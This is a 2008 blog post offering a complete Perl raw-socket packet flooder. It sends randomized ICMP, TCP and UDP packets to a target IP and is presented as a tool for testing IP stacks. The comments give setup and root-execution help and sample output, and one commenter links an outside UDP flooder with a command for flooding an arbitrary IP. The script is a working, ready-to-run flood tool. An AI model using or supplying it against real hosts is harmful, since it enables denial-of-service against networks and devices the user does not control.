04 November 2008

Packet Flooder Script

I considered for a while whether or not to post this here.
Ultimately I decided to go ahead and do it for a couple of reasons:

1. This isn't anything special, there are myriad similar (or better) tools out there that do the same thing.
2. It is actually useful for testing IP stacks on various devices.

And so, here it is, a perl based packet flood script.
It's got a few things that make it interesting:

1. Ports are chosen randomly for TCP and UDP.
2. ICMP type codes are chosen randomly.
3. TCP flags are chosen randomly.
4. The fragment bit is un/set randomly.



#!/usr/bin/perl -w
# =================================================
# simple network flooder script
# takes type of flood (icmp, tcp, udp) as param
# optionally takes dest ip and packet count
# =================================================
my $VERSION = 0.5;
# =================================================
use strict;
use Net::RawIP;

my $flood = shift or &usage();
my $dstip = shift || '127.0.0.1';
my $pktct = shift || 100;

&icmpflood($dstip, $pktct) if $flood =~ 'icmp';
&tcpflood($dstip, $pktct) if $flood =~ 'tcp';
&udpflood($dstip, $pktct) if $flood =~ 'udp';

sub icmpflood() {
my($dstip, $pktct, $code, $type, $frag);
$dstip = shift;
$pktct = shift;

print "\nstarting flood to $dstip\n";
for(my $i=0; $i <= $pktct; $i++) {

$code = int(rand(255));
$type = int(rand(255));
$frag = int(rand(2));

my $packet = new Net::RawIP({
ip => {
daddr => $dstip,
frag_off => $frag,
},
icmp => {
code => $code,
type => $type,
}
});

$packet->send;
print "sent icmp $type->$code, frag: $frag\n";
}
print "\nflood complete\n\n";
}

sub tcpflood() {
my($dstip, $pktct, $sport, $dport, $frag, $urg, $psh, $rst, $fin,
$syn, $ack);
$dstip = shift;
$pktct = shift;
print "\nstarting flood to $dstip\n";
for(my $i=0; $i <= $pktct; $i++) {

$sport = int(rand(65535));
$dport = int(rand(65535));
$frag = int(rand(2));
$urg = int(rand(2));
$psh = int(rand(2));
$rst = int(rand(2));
$fin = int(rand(2));
$syn = int(rand(2));
$ack = int(rand(2));

my $packet = new Net::RawIP({
ip => {
daddr => $dstip,
frag_off => $frag,
},
tcp => {
source => $sport,
dest => $dport,
urg => $urg,
psh => $psh,
rst => $rst,
fin => $fin,
syn => $syn,
ack => $ack,
}
});

$packet->send;
print "sent tcp packet from $sport to $dport, frag: $frag, psh:
$psh, rst: $rst, fin: $fin, syn: $syn, ack: $ack\n";
}
print "\nflood complete\n\n";
}

sub udpflood() {
my($dstip, $pktct, $sport, $dport, $frag);
$dstip = shift;
$pktct = shift;

print "\nstarting flood to $dstip\n";
for(my $i=0; $i <= $pktct; $i++) {

$sport = int(rand(255));
$dport = int(rand(255));
$frag = int(rand(2));

my $packet = new Net::RawIP({
ip => {
daddr => $dstip,
frag_off => $frag,
},
udp => {
source => $sport,
dest => $dport,
}
});

$packet->send;
print "sent udp packet from $sport to $dport, frag: $frag\n";
}
print "\nflood complete\n\n";
}

sub usage() {
print "
need to set a valid flood type (one of icmp, tcp, udp)
optionally set dest ip and packetcount

example:

$0 [tcp udp icmp] \n\n";
exit 0;
}

7 comments:

  1. don't seem to have Net::RawIP;
    how do i get it?
    (new to perl...)

    ReplyDelete
  2. Tiene un error de compilacion :/

    ReplyDelete
  3. To anonymous:
    It depends on quite a few factors. If you're using a Debian based Linux distro, perhaps the easiest way is to simply run:
    'apt-get install libnet-rawip-perl.

    On most other systems you can use CPAN like so: perl -MCPAN -e 'install Net::RawIP'.

    To luuckk:
    Sorry it's not working. I need more information to help, but if you're seeing an error similar to the following...
    starting flood to 127.0.0.1
    (rawsock) socket problems [fatal] at /usr/lib/perl5/Net/RawIP.pm line 620.

    ...the problem is that you need to be root in order to use raw sockets on most unix systems. Try running the script as root (eg: "sudo ./scriptname tcp" and it should work.

    ReplyDelete
  4. go Get SCRIPT perl UPD flooder

    http://www.2shared.com/document/grqFTxb7/9C0pl.html

    command flood : perl 9C0.pl 127.0.0.0 6005 9999

    **************** perl 9C0 (ip)who need to flood + prot and 9999

    ReplyDelete
  5. Hi Jason,

    I've tried running as root as you suggested but I'm still receiving the same error.

    $ sudo perl scriptnamed.pl
    (rawsock) socket problems [fatal] at /usr/lib/perl5/site_perl/5.8.8/x86_64-linux-thread-multi/Net/RawIP.pm line 620.

    ReplyDelete
  6. Hey anon.
    I'm not sure why you're seeing that error. I just copy/pasted the code as I have it above into my system, to see if maybe things have changed in the years since I initially wrote this script. It seems to be working still, at least on perl v5.10.1 using the ubuntu packaged version of libnet-rawip-perl.

    Here's an example of how to run it:
    $ sudo ./packetflood.pl tcp localhost 10

    the options I've specified are:
    * tcp = use tcp flood mode
    * localhost = destiniation of flood
    * 10 = send 10 packets)

    Here's what you should see if it's working:

    starting flood to localhost
    sent tcp packet from 63603 to 12185, frag: 0, psh:
    0, rst: 1, fin: 0, syn: 0, ack: 1
    sent tcp packet from 23985 to 59992, frag: 1, psh:
    0, rst: 0, fin: 0, syn: 0, ack: 0
    sent tcp packet from 45043 to 48773, frag: 0, psh:
    0, rst: 1, fin: 0, syn: 1, ack: 1
    sent tcp packet from 27944 to 11086, frag: 0, psh:
    1, rst: 0, fin: 1, syn: 1, ack: 1
    sent tcp packet from 46149 to 37290, frag: 0, psh:
    1, rst: 1, fin: 0, syn: 1, ack: 0
    sent tcp packet from 47262 to 25355, frag: 0, psh:
    1, rst: 1, fin: 1, syn: 0, ack: 1
    sent tcp packet from 11141 to 44979, frag: 1, psh:
    0, rst: 1, fin: 1, syn: 1, ack: 0
    sent tcp packet from 9606 to 18614, frag: 0, psh:
    0, rst: 0, fin: 0, syn: 1, ack: 1
    sent tcp packet from 47445 to 60593, frag: 0, psh:
    0, rst: 0, fin: 0, syn: 0, ack: 1
    sent tcp packet from 49703 to 37715, frag: 1, psh:
    1, rst: 0, fin: 0, syn: 0, ack: 0
    sent tcp packet from 41685 to 8108, frag: 0, psh:
    1, rst: 1, fin: 1, syn: 1, ack: 1

    flood complete

    ReplyDelete